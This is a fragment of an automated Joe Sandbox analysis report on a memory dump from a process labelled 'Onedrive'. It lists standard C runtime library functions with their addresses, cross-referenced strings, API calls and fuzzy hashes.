g, xrefs: 00007FF8A0328073
W, xrefs: 00007FF8A0327F9C
minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00007FF8A0327FA4, 00007FF8A032807B

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr
String ID: W$g$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
API String ID: 4142048518-2829134390
Opcode ID: 5bbead02dfe7c340e301f50630c07c7c7bbcd2b1db9117826fc8bec54c57956b
Instruction ID: 4eaa09c1bc1ff482a6e1d713f8919594ca0922b59628dd3b715bde8d0fa8deb6
Opcode Fuzzy Hash: 5bbead02dfe7c340e301f50630c07c7c7bbcd2b1db9117826fc8bec54c57956b
Instruction Fuzzy Hash: D351FC3661AE86D2DB10CB19E49036AA7A0FBC4BC4F604135EB8E47BA5DF7DD552CB00

Function 00007FF8A032AE99 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 90COMMON

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\misc\signal.cpp, xrefs: 00007FF8A032AF18, 00007FF8A032AF52
local_action != nullptr, xrefs: 00007FF8A032AEF7, 00007FF8A032AF60
%ls, xrefs: 00007FF8A032AF03
raise, xrefs: 00007FF8A032AF59

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$local_action != nullptr$minkernel\crts\ucrt\src\appcrt\misc\signal.cpp$raise
API String ID: 0-2615017910
Opcode ID: 5c35f3dc112a50c0e805789c276cfb06d19a61249ce228f93abf104dd4fd02bb
Instruction ID: af71d138a971a8b57f66e40101a57bca401161173a2a84775b44d4a38be6a05f
Opcode Fuzzy Hash: 5c35f3dc112a50c0e805789c276cfb06d19a61249ce228f93abf104dd4fd02bb
Instruction Fuzzy Hash: D541292291EE83A6F7609B21A45036EB6A0EBA93D0F104135E69E4ABD9CF7DD5448B40

Function 00007FF8A032B870 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 86memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapSize.KERNEL32 ref: 00007FF8A032B94B
HeapReAlloc.KERNEL32 ref: 00007FF8A032B993

Strings

%ls, xrefs: 00007FF8A032B8B3
minkernel\crts\ucrt\src\appcrt\heap\expand.cpp, xrefs: 00007FF8A032B8C8, 00007FF8A032B902
_expand_base, xrefs: 00007FF8A032B909
block != nullptr, xrefs: 00007FF8A032B8A7, 00007FF8A032B910

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Heap$AllocSize
String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
API String ID: 3906553864-3244948836
Opcode ID: 4c804e17fcf2b797cd3c9b60ca826f5f76968aea305c4a7878b56130db89205d
Instruction ID: a21076a09fd4c4979501b62d06b175b3dfc2b47ac9324d057e71cea90869f093
Opcode Fuzzy Hash: 4c804e17fcf2b797cd3c9b60ca826f5f76968aea305c4a7878b56130db89205d
Instruction Fuzzy Hash: 1541593291EE87A6E7509B24E44036AB7A0FB987D4F100536E68D4BBA8DF7DD480CB00

Function 00007FF8A033DCD0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A033DD25
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A033DD64
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A033DD6C

Strings

%ls, xrefs: 00007FF8A033DCED
minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 00007FF8A033DD02
minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 00007FF8A033DD40
public_stream != nullptr, xrefs: 00007FF8A033DCE1

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::_$__crt_unique_heap_ptr
String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$public_stream != nullptr
API String ID: 2978586664-187094882
Opcode ID: d9f09b24430cf7c905dcc77a9539ec568846fcd82fb5aab16ca27f9c7a20dcef
Instruction ID: 27de14b3388fd2ebe543235eef47935966bd9914c5e274d4128a104068094200
Opcode Fuzzy Hash: d9f09b24430cf7c905dcc77a9539ec568846fcd82fb5aab16ca27f9c7a20dcef
Instruction Fuzzy Hash: D2413C22A2AE82A6EB40DB50E4513AA7768FF84780F505136E68E47BA7DF7CD644C740

Function 00007FF8A0308300 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_heap_alloc.LIBCMTD ref: 00007FF8A03083B0
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03083BD
_aligned_msize.LIBCMTD ref: 00007FF8A030840C
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0308416

Strings

D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 00007FF8A0308347
%ls, xrefs: 00007FF8A0308332
to->_What == nullptr && to->_DoFree == false, xrefs: 00007FF8A0308326

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr_aligned_msize_heap_alloc
String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
API String ID: 4052397221-3183830673
Opcode ID: ff1b9f30799f4ad0d9ac1bffd9bde8d84be0301351c13d166f628ec1fe1495ed
Instruction ID: 074c96d1cd56275ef6ddcf733bd382a6f9ec49748b968e2467094b39d7d81c67
Opcode Fuzzy Hash: ff1b9f30799f4ad0d9ac1bffd9bde8d84be0301351c13d166f628ec1fe1495ed
Instruction Fuzzy Hash: D4312A3661EF86A5DA409F55E49026EB7A4FBC5BC0F905032EACD83BA5DF6CD540C700

Function 00007FF8A031CC60 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CD4D

Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CDA5

Strings

%ls, xrefs: 00007FF8A031CCD2
new_bits == _CRTDBG_REPORT_FLAG || new_bits_have_only_valid_flags, xrefs: 00007FF8A031CCC6, 00007FF8A031CD2F
7, xrefs: 00007FF8A031CC68
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00007FF8A031CCE7, 00007FF8A031CD21
_CrtSetDbgFlag, xrefs: 00007FF8A031CD28

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __vcrt_lock$CriticalEnterSection
String ID: %ls$7$_CrtSetDbgFlag$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$new_bits == _CRTDBG_REPORT_FLAG || new_bits_have_only_valid_flags
API String ID: 3216741998-3531600671
Opcode ID: 98ef7632041a8fad0750eee4cc8ea17460eb30706e3ace5ef71840ebc1773ca3
Instruction ID: 8654b7ce8e27f971708aae6ac3c1161be6361700fb58b92c5cd75b279c5090d6
Opcode Fuzzy Hash: 98ef7632041a8fad0750eee4cc8ea17460eb30706e3ace5ef71840ebc1773ca3
Instruction Fuzzy Hash: 92417E3292EA83AAE7509B24E44077A7AA0FB55385F001135F68A4ABE5CF7DE945CF40

Function 00007FF8A033A580 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 373COMMON

Download Yara Rule

Strings

_wcstombs_l_helper, xrefs: 00007FF8A033A693
minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp, xrefs: 00007FF8A033A629, 00007FF8A033A68C
pwcs != nullptr, xrefs: 00007FF8A033A608, 00007FF8A033A69A
%ls, xrefs: 00007FF8A033A614

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$_wcstombs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp$pwcs != nullptr
API String ID: 0-287901994
Opcode ID: 743646601bf834168527aa144c1fd2e5dc80d6afa19a0699e979b3519a2906be
Instruction ID: cc6da4f7715b381695842bc8dfd68c47d2472a9e60087bf0c06bea1bf3878552
Opcode Fuzzy Hash: 743646601bf834168527aa144c1fd2e5dc80d6afa19a0699e979b3519a2906be
Instruction Fuzzy Hash: 8912DB3260DE8696D7708B15E4903AAB7A0F785794F104239EADD47BE8DF7DD484CB01

Function 00007FF8A0324A70 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 260COMMONLIBRARYCODE

Download Yara Rule

Strings

destination_count > 0, xrefs: 00007FF8A0324D22, 00007FF8A0324DB4
%ls, xrefs: 00007FF8A0324B17, 00007FF8A0324D2E, 00007FF8A0324EE4
_wctomb_internal, xrefs: 00007FF8A0324B90, 00007FF8A0324DAD, 00007FF8A0324F63
destination_count <= INT_MAX, xrefs: 00007FF8A0324B0B, 00007FF8A0324B97
minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp, xrefs: 00007FF8A0324B2C, 00007FF8A0324B89, 00007FF8A0324D43, 00007FF8A0324DA6, 00007FF8A0324EF9, 00007FF8A0324F5C
("Buffer too small", 0), xrefs: 00007FF8A0324ED8, 00007FF8A0324F6A

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$("Buffer too small", 0)$_wctomb_internal$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
API String ID: 0-3614322479
Opcode ID: 0f614ffcc1881ecedfdfa505c1d907f0ae2ecf116d141dd64fc1443b1e234b41
Instruction ID: 69a000c1e78cea27e8d0200e9e57ce63142c950f8caadf6241396673bda44581
Opcode Fuzzy Hash: 0f614ffcc1881ecedfdfa505c1d907f0ae2ecf116d141dd64fc1443b1e234b41
Instruction Fuzzy Hash: 3CE12A3290EE83A6E7709B14E4443AAB7A0FBD8784F108536D68D47BA9DF7DD484CB00

Function 00007FF8A030E150 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030E557
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030E579

Strings

%ls, xrefs: 00007FF8A030E341
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo, xrefs: 00007FF8A030E3C2
("Invalid integer length modifier", 0), xrefs: 00007FF8A030E335, 00007FF8A030E3C9
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030E356, 00007FF8A030E3BB

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-3177598755
Opcode ID: 9fcc800b697e66e5a2e00d7e63b0316d99a108fc15282cfc1420a90e1ce9cbd0
Instruction ID: 7b861af7b595f084bb5ff05d6a1a6ab3c3b07bf4991de8684bd15f9d876dcb4f
Opcode Fuzzy Hash: 9fcc800b697e66e5a2e00d7e63b0316d99a108fc15282cfc1420a90e1ce9cbd0
Instruction Fuzzy Hash: 5BC13E2661FE82A5EA609F65F4603BEA761FBC57C0F501032EA8D47B9ACF6DD444CB40

Function 00007FF8A030D3D0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030D7D7
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030D7F9

Strings

%ls, xrefs: 00007FF8A030D5C1
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo, xrefs: 00007FF8A030D642
("Invalid integer length modifier", 0), xrefs: 00007FF8A030D5B5, 00007FF8A030D649
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030D5D6, 00007FF8A030D63B

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-3177598755
Opcode ID: 2903877c41504ff71dd7ac0ce2aa557120b8f1187956e46286f88ae249a88ae2
Instruction ID: 7724432f108a6944a499060c0bf0cc11e77f75c6a1f6076fee448ac909a14c85
Opcode Fuzzy Hash: 2903877c41504ff71dd7ac0ce2aa557120b8f1187956e46286f88ae249a88ae2
Instruction Fuzzy Hash: B4C12F2261FE82A5EB609F65E45037AB7A1FBC57C4F501032EA8E47B9ACF6DD444CB40

Function 00007FF8A030C650 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 239COMMON

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030CA57
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030CA79

Strings

%ls, xrefs: 00007FF8A030C841
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo, xrefs: 00007FF8A030C8C2
("Invalid integer length modifier", 0), xrefs: 00007FF8A030C835, 00007FF8A030C8C9
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030C856, 00007FF8A030C8BB

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-3177598755
Opcode ID: 8c2f7f8cf4eb60a7f862857748a541016eaa27abcc5c4df5f5fa1067a4d7720e
Instruction ID: 36809265b782df805bfdd24dd46df816da31fa726824bcbfa0970617f3936b0d
Opcode Fuzzy Hash: 8c2f7f8cf4eb60a7f862857748a541016eaa27abcc5c4df5f5fa1067a4d7720e
Instruction Fuzzy Hash: 76C1202262EE8695EB60DB65E45037FA761FBC57C0F505032EA8D47B9ACF2DD444CB40

Function 00007FF8A030C1D0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030C5D7
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030C5F9

Strings

%ls, xrefs: 00007FF8A030C3C1
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v, xrefs: 00007FF8A030C442
("Invalid integer length modifier", 0), xrefs: 00007FF8A030C3B5, 00007FF8A030C449
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030C3D6, 00007FF8A030C43B

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-1003573884
Opcode ID: b4f3e4260ec6d7b3d90b938558def7c2c3ed8f015c38342de67e4952101a5583
Instruction ID: 991222f417e0177458779098a5f82da9d021e6d6f3e76069e77b2bea88f4dd83
Opcode Fuzzy Hash: b4f3e4260ec6d7b3d90b938558def7c2c3ed8f015c38342de67e4952101a5583
Instruction Fuzzy Hash: 82C11E2662EE8295EA609F65E49037EB761FBC57C0F501031EA8E47B9ACF6DD444CB40

Function 00007FF8A030CAD0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMONLIBRARYCODE

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030CED7
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030CEF9

Strings

%ls, xrefs: 00007FF8A030CCC1
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard, xrefs: 00007FF8A030CD42
("Invalid integer length modifier", 0), xrefs: 00007FF8A030CCB5, 00007FF8A030CD49
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030CCD6, 00007FF8A030CD3B

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-2041781485
Opcode ID: 78b8b794c379b49e69a8979361e5dbb4b806ee50a32993ebf0ad29c2e8166d96
Instruction ID: 34286686ccfaf246a0786a0c846faa36a8c79f9cf1f5889fd1cc2ebaa7df742b
Opcode Fuzzy Hash: 78b8b794c379b49e69a8979361e5dbb4b806ee50a32993ebf0ad29c2e8166d96
Instruction Fuzzy Hash: AEC11E2262FE82A5EA60DB65E45037AB761FBC57C0F500036EA8E47B9ACF6DD445CB40

Function 00007FF8A030DCD0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMONLIBRARYCODE

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030E0D7
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030E0F9

Strings

%ls, xrefs: 00007FF8A030DEC1
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v, xrefs: 00007FF8A030DF42
("Invalid integer length modifier", 0), xrefs: 00007FF8A030DEB5, 00007FF8A030DF49
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030DED6, 00007FF8A030DF3B

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-1003573884
Opcode ID: b9c71c7ffbedc175137bab90b96f82f8f806c00a84a48dc1ea6ce4bedb3eed6c
Instruction ID: 552a612e0094886a2d370ccb89afa969b42cb382207fa21f6d41c1d256525bb1
Opcode Fuzzy Hash: b9c71c7ffbedc175137bab90b96f82f8f806c00a84a48dc1ea6ce4bedb3eed6c
Instruction Fuzzy Hash: 08C11E2261EEC395EA609B65E4503BAB7A1EBC57C0F501032EA8E47B9ACF6DD444CB40

Function 00007FF8A030BD50 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030C157
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030C179

Strings

%ls, xrefs: 00007FF8A030BF41
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard, xrefs: 00007FF8A030BFC2
("Invalid integer length modifier", 0), xrefs: 00007FF8A030BF35, 00007FF8A030BFC9
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030BF56, 00007FF8A030BFBB

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-2041781485
Opcode ID: 469e38d6eed64a1a91316f730531ced8dac0510bf6a3972017723c6cfb3396b6
